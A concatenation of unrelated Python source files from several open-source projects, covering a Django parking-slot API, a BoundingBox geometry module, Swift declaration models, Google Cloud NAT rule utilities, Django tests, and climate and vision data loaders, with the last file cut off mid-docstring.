"""
self._config['location'] = location
return self
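# Illustrative use (the paths below are arbitrary examples):
#     ruleset = RuleSet("/rules/my-rules.rules")
#     ruleset.set_location("/rules/other-rules.rules").location()  # -> '/rules/other-rules.rules'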
|
|
api/views/parking_slot.py
|
santiagoSSAA/ParkingLot_Back
|
|
|
""" Contains Parking Slot endpoint definition """
from cerberus import Validator
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from ..helpers.token import TokenHandler
from ..helpers.paginator import paginate_content
from ..models.parking_slot import ParkingSlot
from ..serializers.parking_slot import ParkingSlotSerializer
from ..serializers.parking_slot import ParkingSlotClientSerializer
class ParkingSlotApi(APIView, TokenHandler):
""" Defines the HTTP verbs to parking slot model management. """
def post(self, request):
""" Create a parking slot.
Parameters
----------
request (dict)
Contains http transaction information.
Returns
-------
Response (JSON, int)
Body response and status code.
"""
payload, user = self.get_payload(request)
if not payload:
return Response(status=status.HTTP_401_UNAUTHORIZED)
if user.profile != "admin":
return Response(status=status.HTTP_403_FORBIDDEN)
validator = Validator({"place_code": {"required": True,
"type": "string"}})
if not validator.validate(request.data):
return Response({
"code": "invalid_body",
"detailed": "cuerpo inválido",
"data": validator.errors
}, status=status.HTTP_400_BAD_REQUEST)
if ParkingSlot.objects.filter(
place_code=request.data.get("place_code").upper(),is_active=True):
            return Response({
                "code": "slot_already_exists",
                "detailed": "Estacionamiento ya registrado"
            }, status=status.HTTP_409_CONFLICT)
request.data["place_code"] = request.data["place_code"].upper()
slot = ParkingSlot.objects.create(**request.data)
return Response({"created": slot.pk}, status=status.HTTP_201_CREATED)
@paginate_content()
def get(self, request):
""" Retrieve a list of slots.
Parameters
----------
request (dict)
Contains http transaction information.
Returns
-------
Response (JSON, int)
Body response and status code.
"""
payload, user = self.get_payload(request)
if not payload:
return Response(status=status.HTTP_401_UNAUTHORIZED)
validator = Validator({
"place_code": {"required": False,"type": "string"},
"status": {"required": False, "type": "string",
"allowed": ["Ocupado", "Disponible"]}
})
if not validator.validate(request.GET):
return Response({
"code": "invalid_filtering_params",
"detailed": "Parámetros de búsqueda inválidos",
"data": validator.errors
}, status=status.HTTP_400_BAD_REQUEST)
query = {}
if request.GET.get("place_code"):
query["place_code"] = request.GET.get("place_code")
if user.profile == "client":
query["is_active"] = True
slots = ParkingSlot.objects.filter(**query)
if slots and request.GET.get("status"):
slots = [slot.id for slot in slots
if slot.get_status() == request.GET.get("place_code")]
slots = ParkingSlot.objects.filter(pk__in=slots)
if user.profile != "admin":
slots = [slot.id for slot in slots if slot.get_status() == "Disponible"]
slots = ParkingSlot.objects.filter(pk__in=slots)
count = slots.count()
data = slots.order_by('-created')[
self.pagination_start: self.pagination_end + 1]
return Response({
'count': count,
'data': (ParkingSlotClientSerializer(data,many=True)
if user.profile == "client" else ParkingSlotSerializer(data,many=True)
).data,
}, status=status.HTTP_200_OK)
class SpecificParkingSlotApi(APIView, TokenHandler):
""" Defines the HTTP verbs to specific parking slot model management. """
def get(self, request, *args, **kwargs):
""" Retrieve specific slot information.
Parameters
----------
request (dict)
Contains http transaction information.
Returns
-------
Response (JSON, int)
Body response and status code.
"""
payload, user = self.get_payload(request)
if not payload:
return Response(status=status.HTTP_401_UNAUTHORIZED)
if user.profile != "admin":
return Response(status=status.HTTP_403_FORBIDDEN)
slot = ParkingSlot.objects.filter(
pk=kwargs["id"],is_active=True).first()
if not slot:
return Response({
"code": "slot_not_found",
"detailed": "aparcamiento no encontrado"
},status=status.HTTP_404_NOT_FOUND)
return Response({
"data": ParkingSlotSerializer(slot).data
},status=status.HTTP_200_OK)
def patch(self, request, *args, **kwargs):
""" Update an slot information.
Parameters
----------
request (dict)
Contains http transaction information.
Returns
-------
Response (JSON, int)
Body response and status code.
"""
payload, user = self.get_payload(request)
if not payload:
return Response(status=status.HTTP_401_UNAUTHORIZED)
if user.profile != "admin":
return Response(status=status.HTTP_403_FORBIDDEN)
validator = Validator({"place_code": {"required": False,"type": "string"}})
if not validator.validate(request.data):
return Response({
"code": "invalid_body",
"detailed": "cuerpo inválido",
"data": validator.errors
}, status=status.HTTP_400_BAD_REQUEST)
if not ParkingSlot.objects.filter(pk=kwargs["id"],is_active=True):
return Response({
"code": "slot_not_found",
"detailed": "aparcamiento no encontrado"
},status=status.HTTP_404_NOT_FOUND)
ParkingSlot.objects.filter(pk=kwargs["id"]).update(**request.data)
return Response(status=status.HTTP_200_OK)
def delete(self, request, *args, **kwargs):
""" Delete slot information.
Parameters
----------
request (dict)
Contains http transaction information.
Returns
-------
Response (JSON, int)
Body response and status code.
"""
payload, user = self.get_payload(request)
if not payload:
return Response(status=status.HTTP_401_UNAUTHORIZED)
if user.profile != "admin":
return Response(status=status.HTTP_403_FORBIDDEN)
slot = ParkingSlot.objects.filter(
pk=kwargs["id"],is_active=True).first()
if not slot:
return Response({
"code": "slot_not_found",
"detailed": "aparcamiento no encontrado"
},status=status.HTTP_404_NOT_FOUND)
slot.is_active = False
slot.save()
return Response(status=status.HTTP_200_OK)
|
|
|
|
|
|
from __future__ import print_function
from __future__ import division
import numpy as np
class Line:
"""Line object
Example
-------
>>> from BoundingBox import Line
>>> l1 = Line(-2, 2)
>>> l1.length()
4
Test cases:
--- first
=== second
======
--
--
------
----------
--------------
----------
--
No overlap.
>>> x = Line.fromOverlap(Line(1,10), Line(10,20))
>>> print(x)
[0 0]
>>> x.length()
0
>>> x = Line.fromOverlap(Line(11,12), Line(10,20))
>>> print(x)
[11 12]
>>> x.length()
1
Overlap of 2, first left.
>>> x = Line.fromOverlap(Line(8,12), Line(10,20))
>>> print(x)
[10 12]
>>> x.length()
2
Edge overlap
>>> x = Line.fromOverlap(Line(6,20), Line(10,20))
>>> print(x)
[10 20]
>>> x.length()
10
Second completely inside first.
>>> x = Line.fromOverlap(Line(1,40), Line(20,30))
>>> print(x)
[20 30]
>>> x.length()
10
Edge overlap
>>> x = Line.fromOverlap(Line(10,25), Line(10,20))
>>> print(x)
[10 20]
>>> x.length()
10
No overlap
>>> x = Line.fromOverlap(Line(0,10), Line(-10,-5))
>>> print(x)
[0 0]
>>> x.length()
0
"""
def __init__(self, x1, x2):
self.x1 = x1
self.x2 = x2
# TODO error check. x2 >= x1
def __str__(self):
return "[{} {}]".format(self.x1, self.x2)
def length(self):
return self.x2 - self.x1
@classmethod
def fromOverlap(cls, first, second):
#print("first", first)
#print("second", second)
if first.x2 <= second.x1:
#print("return 0")
return cls(0, 0)
elif first.x2 <= second.x2:
if first.x1 >= second.x1:
#print("return 1")
return first
else:
#print("return 2")
return cls(second.x1, first.x2)
else: # first.x2 > second.x2
if first.x1 >= second.x2:
return cls(0, 0)
elif first.x1 >= second.x1:
#print("return 3")
return cls(first.x1, second.x2)
else: # first.x1 < second.x1
#print("return 4")
return second
class BoundingBox:
""""Bounding Box object
- works for pixel values as well as real values.
>>> import numpy as np
>>> from BoundingBox import BoundingBox
>>> box = BoundingBox( (1,2), (4,5) )
>>> box.ul()
array([1, 2])
>>> box.lr()
array([4, 5])
>>> box.ur()
array([4, 2])
>>> box.ll()
array([1, 5])
>>> box.contour()
array([[1, 2],
[4, 2],
[4, 5],
[1, 5],
[1, 2]])
>>> box.area()
9
>>> box.bound(lower_right=[3,4]).lr()
array([3, 4])
>>> box.bound(upper_left=[2,3]).ul()
array([2, 3])
>>> box.area()
1
>>> print(box)
[[2 3]
[3 4]]
>>> contour = np.array([[1, 2], [4, 2], [4, 5], [1, 5], [1, 2]])
>>> print(BoundingBox.fromContour(contour))
[[1. 2.]
[4. 5.]]
"""
def __init__(self, upper_left=None, lower_right=None):
"""Init object if upper left or lower right point is given.
Parameters
----------
upper_left : np.array(2)
lower_right : np.array(2)
"""
#TODO error check that ul point is instead ul, lr point is indeed lr.
if upper_left is None:
self.upper_left_ = np.zeros(2)
else:
self.upper_left_ = np.array(upper_left)
#print(type(self.upper_left_), self.upper_left_)
if lower_right is None:
self.lower_right_ = np.zeros(2)
else:
self.lower_right_ = np.array(lower_right)
#print(type(self.lower_right_), self.lower_right_)
@classmethod
def fromContour(cls, contour):
"""Create a bounding box from a contour set.
Parameters
----------
contour : list of np.array(2)
A list of points describing a contour.
Returns
-------
self
A new self object.
"""
mins = np.amin(contour, axis=0)
maxs = np.amax(contour, axis=0)
upper_left = np.floor(mins) # assumes pixel as coordinates
lower_right = np.floor(maxs) # assumes pixel as coordinates
return cls(upper_left, lower_right)
@classmethod
def fromOverlap(cls, first, second):
"""Create a bounding box of the intercept.
Parameters
----------
first : BoundingBox
second : BoundingBox
Return
------
BoundingBox
Example
-------
>>> from BoundingBox import BoundingBox
Some overlap
>>> first = BoundingBox( (2,1), (5,4) )
>>> second = BoundingBox( (4,3), (8,5) )
>>> overlap_box = BoundingBox.fromOverlap(first, second)
>>> print(overlap_box)
[[4 3]
[5 4]]
No overlap
>>> first = BoundingBox( (2,1), (5,4) )
>>> second = BoundingBox( (3,5), (5,7) )
>>> overlap_box = BoundingBox.fromOverlap(first, second)
>>> print(overlap_box)
[[0 0]
[0 0]]
Share an edge
>>> first = BoundingBox( (4,3), (8,5) )
>>> second = BoundingBox( (3,5), (5,7) )
>>> overlap_box = BoundingBox.fromOverlap(first, second)
>>> print(overlap_box)
[[0 0]
[0 0]]
Second completely inside first.
>>> first = BoundingBox( (2,1), (9,7) )
>>> second = BoundingBox( (4,3), (8,5) )
>>> overlap_box = BoundingBox.fromOverlap(first, second)
>>> print(overlap_box)
[[4 3]
[8 5]]
First completely inside second.
>>> first = BoundingBox( (4,3), (8,5) )
>>> second = BoundingBox( (2,1), (9,7) )
>>> overlap_box = BoundingBox.fromOverlap(first, second)
>>> print(overlap_box)
[[4 3]
[8 5]]
First is sideway inside second on the right
>>> first = BoundingBox( (6,4), (7,6) )
>>> second = BoundingBox( (4,3), (8,5) )
>>> overlap_box = BoundingBox.fromOverlap(first, second)
>>> print(overlap_box)
[[6 4]
[7 5]]
Corner touching
>>> first = BoundingBox( (2,1), (5,4) )
>>> second = BoundingBox( (5,4), (6,5) )
>>> overlap_box = BoundingBox.fromOverlap(first, second)
>>> print(overlap_box)
[[0 0]
[0 0]]
"""
# row
line_first = Line( first.ul()[0], first.lr()[0] )
line_second = Line( second.ul()[0], second.lr()[0] )
row_overlap = Line.fromOverlap(line_first, line_second)
#print("row_overlap", row_overlap)
# col
line_first = Line( first.ul()[1], first.lr()[1] )
line_second = Line( second.ul()[1], second.lr()[1] )
col_overlap = Line.fromOverlap(line_first, line_second)
#print("col_overlap", col_overlap)
if (row_overlap.length() == 0) or (col_overlap.length() == 0):
return cls( (0,0), (0,0) )
else:
return cls( (row_overlap.x1, col_overlap.x1), (row_overlap.x2, col_overlap.x2) )
def height(self):
"""
Returns
-------
float
Height of bounding box.
Example
-------
>>> from BoundingBox import BoundingBox
>>> b = BoundingBox( (4,3), (8,5) )
>>> b.height()
4
"""
return self.lower_right_[0] - self.upper_left_[0]
def width(self):
"""
Returns
-------
float
Width of bounding box.
Example
-------
>>> from BoundingBox import BoundingBox
>>> b = BoundingBox( (4,3), (8,5) )
>>> b.width()
2
"""
return self.lower_right_[1] - self.upper_left_[1]
def area(self):
"""
Returns
-------
float
Area of bounding box.
Example
-------
>>> from BoundingBox import BoundingBox
>>> b = BoundingBox( (4,3), (8,5) )
>>> b.area()
8
"""
return self.height() * self.width()
def aspectRatio(self):
"""
Returns
-------
float
Aspect ratio of the box
Example
-------
>>> from BoundingBox import BoundingBox
>>> b = BoundingBox( (4,3), (8,5) )
>>> b.aspectRatio()
0.5
>>> b = BoundingBox( (4,3), (4,5) )
>>> b.aspectRatio()
nan
"""
if float(self.height()) == 0.0:
return float('nan')
else:
return self.width() / self.height()
def ul(self):
"""
Returns
-------
np.array(2)
Return the upper left point, e.g. (row, col)
"""
return self.upper_left_
def lr(self):
"""
Returns
-------
np.array(2)
Return the lower right point, e.g. (row, col)
"""
return self.lower_right_
def ur(self):
"""
Returns
-------
np.array(2)
Return the upper right point, e.g. (row, col)
"""
return np.array([self.lower_right_[0], self.upper_left_[1]])
def ll(self):
"""
Returns
-------
np.array(2)
Return the lower left point, e.g. (row, col)
"""
return np.array([self.upper_left_[0], self.lower_right_[1]])
def contour(self):
"""
Returns
-------
A np.array of np.array(2)
Each contour is an ndarray of shape (n, 2), consisting of n (row, column) coordinates along the contour.
"""
return np.array([self.ul(), self.ur(), self.lr(), self.ll(), self.ul()])
def bound(self, upper_left = None, lower_right = None):
"""Trim bounding box by given limits.
Parameters
----------
upper_left : np.array(2)
lower_right : np.array(2)
Returns
-------
self
Modified self object.
"""
if upper_left is not None:
if upper_left[0] > self.upper_left_[0]:
self.upper_left_[0] = upper_left[0]
if upper_left[1] > self.upper_left_[1]:
self.upper_left_[1] = upper_left[1]
if lower_right is not None:
if self.lower_right_[0] > lower_right[0]:
self.lower_right_[0] = lower_right[0]
if self.lower_right_[1] > lower_right[1]:
self.lower_right_[1] = lower_right[1]
return self
def __str__(self):
"""Return string representation
Returns
-------
str
String representation of self.
"""
x = np.array([self.upper_left_, self.lower_right_])
return "{}".format(x)
if __name__ == "__main__":
import doctest
import sys
(failure_count, test_count) = doctest.testmod()
sys.exit(failure_count)
|
|
utils/data/swift_decls.py
|
|
|
|
from dataclasses import dataclass
from enum import Enum
from typing import List
from pathlib import Path
from utils.converters.syntax_stream import SyntaxStream
from utils.data.compound_symbol_name import CompoundSymbolName
from utils.constants.constants import backticked_term
class SwiftDeclVisitResult(Enum):
"""
Defines the behavior of a SwiftDeclVisitor as it visits declarations.
"""
VISIT_CHILDREN = 0
"The visitor should visit the children of a declaration."
SKIP_CHILDREN = 1
"The visitor should skip the children of a declaration."
@dataclass
class SourceLocation(object):
file: Path
line: int
column: int | None
@dataclass
class SwiftDecl(object):
name: CompoundSymbolName
original_name: CompoundSymbolName
origin: SourceLocation
doccomments: list[str]
"A list of documentation comments associated with this element."
def write(self, stream: SyntaxStream):
for comment in self.doccomments:
stream.line(f"/// {comment}")
def copy(self):
raise NotImplementedError("Must be implemented by subclasses.")
def accept(self, visitor: "SwiftDeclVisitor") -> SwiftDeclVisitResult:
raise NotImplementedError("Must be implemented by subclasses.")
def accept_post(self, visitor: "SwiftDeclVisitor"):
raise NotImplementedError("Must be implemented by subclasses.")
def children(self) -> list["SwiftDecl"]:
raise NotImplementedError("Must be implemented by subclasses.")
@dataclass
class SwiftEnumCaseDecl(SwiftDecl):
def write(self, stream: SyntaxStream):
super().write(stream)
if self.name.to_string() != self.original_name.to_string():
stream.line(
f"static let {backticked_term(self.name.to_string())} = {self.original_name.to_string()}"
)
def copy(self):
return SwiftEnumCaseDecl(
name=self.name,
original_name=self.original_name,
origin=self.origin,
doccomments=self.doccomments,
)
def accept(self, visitor: "SwiftDeclVisitor") -> SwiftDeclVisitResult:
return visitor.visit_enum_case_decl(self)
def accept_post(self, visitor: "SwiftDeclVisitor"):
return visitor.post_enum_case_decl(self)
def children(self) -> list["SwiftDecl"]:
return list()
@dataclass
class SwiftEnumDecl(SwiftDecl):
cases: List[SwiftEnumCaseDecl]
conformances: list[str]
def write(self, stream: SyntaxStream):
super().write(stream)
name = self.name.to_string()
if name != self.original_name.to_string():
stream.line(f"typealias {name} = {self.original_name.to_string()}")
stream.line()
# Emit conformances
if len(self.conformances) > 0:
for conformance in set(self.conformances):
stream.line(f"extension {name}: {conformance} {{ }}")
stream.line()
decl = f"public extension {name}"
if len(self.cases) == 0:
stream.line(decl + " { }")
return
with stream.block(decl + " {"):
for i, case in enumerate(self.cases):
if i > 0:
stream.line()
case.write(stream)
def copy(self):
return SwiftEnumDecl(
name=self.name,
original_name=self.original_name,
origin=self.origin,
doccomments=self.doccomments,
cases=list(map(lambda c: c.copy(), self.cases)),
conformances=self.conformances,
)
def accept(self, visitor: "SwiftDeclVisitor") -> SwiftDeclVisitResult:
return visitor.visit_enum_decl(self)
def accept_post(self, visitor: "SwiftDeclVisitor"):
return visitor.post_enum_decl(self)
def children(self) -> list["SwiftDecl"]:
return list(self.cases)
class SwiftDeclVisitor:
def visit_enum_decl(self, decl: SwiftEnumDecl) -> SwiftDeclVisitResult:
return SwiftDeclVisitResult.VISIT_CHILDREN
def post_enum_decl(self, decl: SwiftEnumDecl):
pass
def visit_enum_case_decl(self, decl: SwiftEnumCaseDecl) -> SwiftDeclVisitResult:
return SwiftDeclVisitResult.VISIT_CHILDREN
def post_enum_case_decl(self, decl: SwiftEnumCaseDecl):
pass
def walk_decl(self, decl: SwiftDecl):
walker = SwiftDeclWalker(self)
walker.walk_decl(decl)
class SwiftDeclAnyVisitor(SwiftDeclVisitor):
"""
A declaration visitor that pipes all visits to `self.visit_any_decl`
"""
def visit_any_decl(self, decl: SwiftDecl) -> SwiftDeclVisitResult:
return SwiftDeclVisitResult.VISIT_CHILDREN
def post_any_decl(self, decl: SwiftDecl):
pass
def visit_enum_decl(self, decl: SwiftEnumDecl) -> SwiftDeclVisitResult:
return self.visit_any_decl(decl)
def post_enum_decl(self, decl: SwiftEnumDecl):
self.post_any_decl(decl)
def visit_enum_case_decl(self, decl: SwiftEnumCaseDecl) -> SwiftDeclVisitResult:
return self.visit_any_decl(decl)
def post_enum_case_decl(self, decl: SwiftEnumCaseDecl):
self.post_any_decl(decl)
class SwiftDeclWalker:
def __init__(self, visitor: SwiftDeclVisitor):
self.visitor = visitor
def walk_decl(self, decl: SwiftDecl):
result = decl.accept(self.visitor)
if result == SwiftDeclVisitResult.VISIT_CHILDREN:
for child in decl.children():
self.walk_decl(child)
decl.accept_post(self.visitor)
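# A small visitor sketch (illustrative; the CasePrinter class and some_enum_decl are hypothetical).
# Visitors return VISIT_CHILDREN or SKIP_CHILDREN to steer SwiftDeclWalker through the tree:
#
#     class CasePrinter(SwiftDeclAnyVisitor):
#         def visit_any_decl(self, decl: SwiftDecl) -> SwiftDeclVisitResult:
#             print(decl.name.to_string())
#             return SwiftDeclVisitResult.VISIT_CHILDREN
#
#     CasePrinter().walk_decl(some_enum_decl)  # visits the enum decl and each of its cases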
|
|
lib/googlecloudsdk/command_lib/compute/routers/nats/rules/rules_utils.py
|
google-cloud-sdk-unofficial/google-cloud-sdk
|
|
|
# -*- coding: utf-8 -*- #
# Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Util functions for NAT commands."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.command_lib.compute.routers.nats.rules import flags
from googlecloudsdk.core import exceptions as core_exceptions
import six
def CreateRuleMessage(args, compute_holder):
"""Creates a Rule message from the specified arguments."""
active_ips = [
six.text_type(ip) for ip in flags.ACTIVE_IPS_ARG_CREATE.ResolveAsResource(
args, compute_holder.resources)
]
return compute_holder.client.messages.RouterNatRule(
ruleNumber=args.rule_number,
match=args.match,
action=compute_holder.client.messages.RouterNatRuleAction(
sourceNatActiveIps=active_ips))
class RuleNotFoundError(core_exceptions.Error):
"""Raised when a Rule is not found."""
def __init__(self, rule_number):
msg = 'Rule `{0}` not found'.format(rule_number)
super(RuleNotFoundError, self).__init__(msg)
def FindRuleOrRaise(nat, rule_number):
"""Returns the Rule with the given rule_number in the given NAT."""
for rule in nat.rules:
if rule.ruleNumber == rule_number:
return rule
raise RuleNotFoundError(rule_number)
def UpdateRuleMessage(rule, args, compute_holder):
"""Updates a Rule message from the specified arguments."""
if args.match:
rule.match = args.match
if args.source_nat_active_ips:
rule.action.sourceNatActiveIps = [
six.text_type(ip)
for ip in flags.ACTIVE_IPS_ARG_UPDATE.ResolveAsResource(
args, compute_holder.resources)
]
if args.source_nat_drain_ips:
rule.action.sourceNatDrainIps = [
six.text_type(ip) for ip in flags.DRAIN_IPS_ARG.ResolveAsResource(
args, compute_holder.resources)
]
elif args.clear_source_nat_drain_ips:
rule.action.sourceNatDrainIps = []
|
|
pytoolkit/layers/__init__.py
|
|
|
|
"""カスタムレイヤー。"""
# pylint: skip-file
# flake8: noqa
from .activations import *
from .attentions import *
from .blocks import *
from .convolutional import *
from .endpoint import *
from .misc import *
from .noise import *
from .normalization import *
from .pooling import *
|
|
classphoto/tests/test_view.py
|
|
|
|
from django.test import TestCase
from django.test.client import Client
from mock import patch
from signup import models as signup_api
from classphoto import models as classphoto_api
@patch('signup.models.sequence_model.get_current_sequence_number', lambda: 1)
class ViewTest(TestCase):
SIGNUP_DATA = {
'email': '<EMAIL>',
'questions': {
'timezone': 'Africa/Johannesburg',
'groupRadios': 'true',
'styleRadios': 'try',
'expertiseRadios': 'think',
}
}
BIO_DATA = {
'email': '<EMAIL>',
'name': '<NAME>',
'bio': 'This is some info',
'avatar': 'http://placehold.it/120x120'
}
def test_sequence_redirect(self):
c = Client()
resp = c.get('/classphoto/')
self.assertRedirects(resp, '/classphoto/1/')
def test_un_signedup_bio(self):
c = Client()
resp = c.post('/classphoto/1/save_bio/', self.BIO_DATA)
self.assertRedirects(resp, '/classphoto/1/')
bios = classphoto_api.get_bios(1)
self.assertEquals(len(bios), 0)
def test_signed_up_not_signed_in_bio_save(self):
signup_api.create_signup(**self.SIGNUP_DATA)
c = Client()
resp = c.post('/classphoto/1/save_bio/', self.BIO_DATA)
self.assertRedirects(resp, '/classphoto/1/')
bios = classphoto_api.get_bios(1)
self.assertEquals(len(bios), 0)
@patch('classphoto.emails.mailgun.api.send_email')
def test_request_user_link(self, patcher):
signup = signup_api.create_signup(**self.SIGNUP_DATA)
c = Client()
resp = c.post('/classphoto/request_link/', self.BIO_DATA, follow=True)
self.assertRedirects(resp, '/classphoto/1/')
self.assertTrue(patcher.called)
def test_signed_in(self):
signup = signup_api.create_signup(**self.SIGNUP_DATA)
c = Client()
resp = c.get('/classphoto/1/?key={0}'.format(signup['key']))
session = c.session
self.assertEquals(session['user_email'], self.BIO_DATA['email'])
self.assertRedirects(resp, '/classphoto/1/')
def test_signed_up_signed_in_bio_save(self):
signup = signup_api.create_signup(**self.SIGNUP_DATA)
c = Client()
resp = c.get('/classphoto/1/?key={0}'.format(signup['key']))
resp = c.post('/classphoto/1/save_bio/', self.BIO_DATA)
self.assertRedirects(resp, '/classphoto/1/')
bios = classphoto_api.get_bios(0)
self.assertEquals(len(bios), 0)
|
|
|
|
|
|
from django.conf import settings
from django.contrib import messages
from django.http import HttpResponseRedirect
from django.shortcuts import render
from .forms import EmailSignupForm
from .models import EmailSignup
def email_list_signup(request):
form = EmailSignupForm(request.POST or None)
if request.method == "POST":
if form.is_valid():
email_signup_qs = EmailSignup.objects.filter(email=form.instance.email)
if email_signup_qs.exists():
messages.info(request, "You are already subscribed")
else:
form.save()
messages.success(request, "You are successfully subscribed")
return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
|
|
.config/polybar/scripts/updates.py
|
|
|
|
import subprocess
getVersion = subprocess.Popen("checkupdates | wc -l", shell=True, stdout=subprocess.PIPE).stdout
version = getVersion.read()
if(version.decode() == "0\n"):
print("")
else:
print(version.decode())
|
|
|
|
|
|
import os.path as osp
import numpy as np
from opt import parse_opt
import h5py
from glob import glob
import json
opt = parse_opt()
opt = vars(opt)
class Roidb(object):
def __init__(self, image_set, model_method):
self.image_set = image_set
self.model_method = model_method
self._data_path = osp.join(opt['data_root'], 'gt_objects')
self._image_ids, self._roidb, self._h5_files, self._h5_lrel_files = self._load_roidb()
def _load_roidb(self):
info_file = osp.join(self._data_path, 'gt_objects_info.json')
num_files = len(glob(osp.join(self._data_path, 'gt_objects_*.h5')))
h5_paths = [osp.join(self._data_path, 'gt_objects_%d.h5' % n)
for n in range(num_files)]
h5_lrel_paths = [osp.join(self._data_path, 'lrel_gt_objs_%d.h5' % n)
for n in range(num_files)]
with open(info_file) as f:
all_info = json.load(f)
h5_files = [h5py.File(path, 'r') for path in h5_paths]
image_ids = []
data = {}
for img_id in all_info:
info = all_info[img_id]
file, idx, num = info['file'], info['idx'], info['objectsNum']
bbox = h5_files[file]['bboxes'][idx]
if 'cls' in h5_files[file]:
cls = h5_files[file]['cls'][idx]
else:
cls = np.ones((num,), dtype=np.int) * 999999
width = info['width']
height = info['height']
image_ids.append(img_id)
data[img_id] = {'size': np.array([width, height], dtype=np.float32),
'num_objs': num,
'cls': np.array(cls[0:num], dtype=np.float32),
'box': np.array(bbox[0:num,:], dtype=np.float32),
'file': file,
'idx': idx}
if self.model_method in ['cmrin', 'dga']:
h5_lrel_files = [h5py.File(path, 'r') for path in h5_lrel_paths]
return image_ids, data, h5_files, h5_lrel_files
else:
return image_ids, data, h5_files, None
@property
def image_ids(self):
return self._image_ids
@property
def roidb(self):
return self._roidb
@property
def num_images(self):
return len(self._image_ids)
@property
def h5_files(self):
return self._h5_files
@property
def h5_lrel_files(self):
return self._h5_lrel_files
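# A minimal usage sketch (not part of the original module; it assumes the
# gt_objects json/h5 files exist under opt['data_root'] and that 'train' is a
# valid image_set name for this project).
if __name__ == '__main__':
    roidb = Roidb(image_set='train', model_method='cmrin')
    print('number of images:', roidb.num_images)
    first_id = roidb.image_ids[0]
    print('objects in first image:', roidb.roidb[first_id]['num_objs'])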
|
|
snakypy/zshpower/commands/reset.py
|
|
|
|
from snakypy.helpers import printer
from snakypy.helpers.ansi import FG
from snakypy.helpers.catches.generic import whoami
from snakypy.zshpower.commands.utils.handle import records
from snakypy.zshpower.config.base import Base
from snakypy.zshpower.config.config import config_content
from snakypy.zshpower.database.dao import DAO
from snakypy.zshpower.utils.check import checking_init
from snakypy.zshpower.utils.modifiers import create_toml
from snakypy.zshpower.utils.process import reload_zsh
class ResetCommand(Base):
def __init__(self, home: str):
Base.__init__(self, home)
def run(self, arguments: dict) -> None:
checking_init(self.HOME, self.logfile)
if arguments["--config"]:
create_toml(config_content, self.config_file, force=True)
printer("Reset process finished.", foreground=FG().FINISH)
self.log.record(
f"User ({whoami()}) reset settings.", colorize=True, level="info"
)
reload_zsh()
elif arguments["--db"]:
DAO().create_table(self.tbl_main)
records("insert", "ZSHPower Restoring the database ...", FG().QUESTION)
printer("Done!", foreground=FG().FINISH)
self.log.record(
f"User ({whoami()}) reset database.", colorize=True, level="info"
)
|
|
|
|
|
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import calendar
from datetime import timedelta, datetime
import re
import string
from ocw.dataset import Dataset
import ocw.utils as utils
import netCDF4
import numpy
import numpy.ma as ma
LAT_NAMES = ['x', 'rlat', 'rlats', 'lat', 'lats', 'latitude', 'latitudes']
LON_NAMES = ['y', 'rlon', 'rlons', 'lon', 'lons', 'longitude', 'longitudes']
TIME_NAMES = ['time', 'times', 'date', 'dates', 'julian']
def _get_netcdf_variable_name(valid_var_names, netcdf, netcdf_var):
''' Determine if one of a set of variable names are in a NetCDF Dataset.
Looks for an occurrence of a valid_var_name in the NetCDF variable data.
This is useful for automatically determining the names of the lat, lon,
and time variable names inside of a dataset object.
:param valid_var_names: The possible variable names to search for in
the netCDF object.
:type valid_var_names: List of Strings
:param netcdf: The netCDF Dataset object in which to check for
valid_var_names.
:type netcdf: netcdf4.Dataset
:param netcdf_var: The relevant variable name to search over in the
netcdf object. This is used to narrow down the search for valid
variable names by first checking the desired variable's dimension
values for one or more of the valid variable names.
:returns: The variable from valid_var_names that it locates in
the netCDF object.
:raises ValueError: When unable to locate a single matching variable
name in the NetCDF Dataset from the supplied list of valid variable
names.
'''
# Check for valid variable names in netCDF variable dimensions
dimensions = netcdf.variables[netcdf_var].dimensions
dims_lower = [dim.encode().lower() for dim in dimensions]
intersect = set(valid_var_names).intersection(dims_lower)
if len(intersect) == 1:
# Retrieve the name of the dimension where we found the matching
# variable name
index = dims_lower.index(intersect.pop())
dimension_name = dimensions[index].encode()
# Locate all of the variables that share the dimension that we matched
# earlier. If the dimension's name matches then that variable is
# potentially what we want to return to the user.
possible_vars = []
for var in netcdf.variables.keys():
var_dimensions = netcdf.variables[var].dimensions
# Skip any variables that are not 1D
if len(var_dimensions) != 1:
continue
if var_dimensions[0].encode() == dimension_name:
possible_vars.append(var)
# If there are multiple variables with matching dimension names then we
# aren't able to determine the correct variable name using the
# variable dimensions. We need to try a different approach. Otherwise,
# we're done!
if len(possible_vars) == 1:
return possible_vars[0]
# Check for valid variable names in netCDF variable names
variables = netcdf.variables.keys()
vars_lower = [var.encode().lower() for var in variables]
intersect = set(valid_var_names).intersection(vars_lower)
if len(intersect) == 1:
index = vars_lower.index(intersect.pop())
return variables[index]
# If we couldn't locate a single matching valid variable then we're unable
# to automatically determine the variable names for the user.
error = (
"Unable to locate a single matching variable name from the "
"supplied list of valid variable names. "
)
raise ValueError(error)
def load_file(file_path,
variable_name,
elevation_index=0,
name='',
lat_name=None,
lon_name=None,
time_name=None):
''' Load a NetCDF file into a Dataset.
:param file_path: Path to the NetCDF file to load.
:type file_path: :mod:`string`
:param variable_name: The variable name to load from the NetCDF file.
:type variable_name: :mod:`string`
:param elevation_index: (Optional) The elevation index for which data should
be returned. Climate data is often 4 dimensional. Some
datasets will have readings at different height/elevation levels. OCW
expects 3D data so a single layer needs to be stripped out when loading.
